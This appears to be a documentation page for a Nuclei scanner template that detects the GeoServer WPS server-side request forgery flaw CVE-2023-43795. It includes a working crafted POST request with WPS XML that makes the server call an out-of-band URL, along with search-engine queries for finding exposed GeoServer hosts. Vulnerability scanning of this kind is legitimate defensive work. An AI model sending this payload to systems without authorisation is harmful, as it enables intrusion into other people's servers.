GeoServer WPS - Server Side Request Forgery
ID: CVE-2023-43795
Severity: critical
Author: DhiyaneshDK
Tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo
Description
Section titled “Description”GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
YAML Source
Section titled “YAML Source”id: CVE-2023-43795
info: name: GeoServer WPS - Server Side Request Forgery author: DhiyaneshDK severity: critical description: | GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2. reference: - https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html - https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956 - https://nvd.nist.gov/vuln/detail/CVE-2023-43795 - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-43795 cwe-id: CWE-918 epss-score: 0.13101 epss-percentile: 0.9552 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: osgeo product: geoserver shodan-query: - title:"GeoServer" - http.title:"geoserver" fofa-query: - app="GeoServer" - app="geoserver" - title="geoserver" google-query: intitle:"geoserver" tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeovariables: oast: "{{interactsh-url}}" string: "{{to_lower(rand_text_alpha(4))}}" value: "{{to_lower(rand_text_alpha(5))}}"
http: - raw: - | POST {{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?> <wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd"> <ows:Identifier>JTS:area</ows:Identifier> <wps:DataInputs> <wps:Input> <ows:Identifier>geom</ows:Identifier> <wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET"> <wps:Header key="{{string}}" value="{{value}}"/> </wps:Reference> </wps:Input> </wps:DataInputs> <wps:ResponseForm> <wps:RawDataOutput> <ows:Identifier>result</ows:Identifier> </wps:RawDataOutput> </wps:ResponseForm> </wps:Execute>
payloads: path: - /wms - /geoserver/wms
stop-at-first-match: true matchers: - type: dsl dsl: - contains(interactsh_protocol, 'http') - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}') - status_code == 200 condition: and# digest: 490a00463044022075befc61fbff576c5caf43457b825071ad39d8979e2e5efc112d1a5875c7a05002206c37eccb9dd0ebdf1e8f29698589808902f869462f0dcc80bf3644ee30989a9a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-43795.yaml"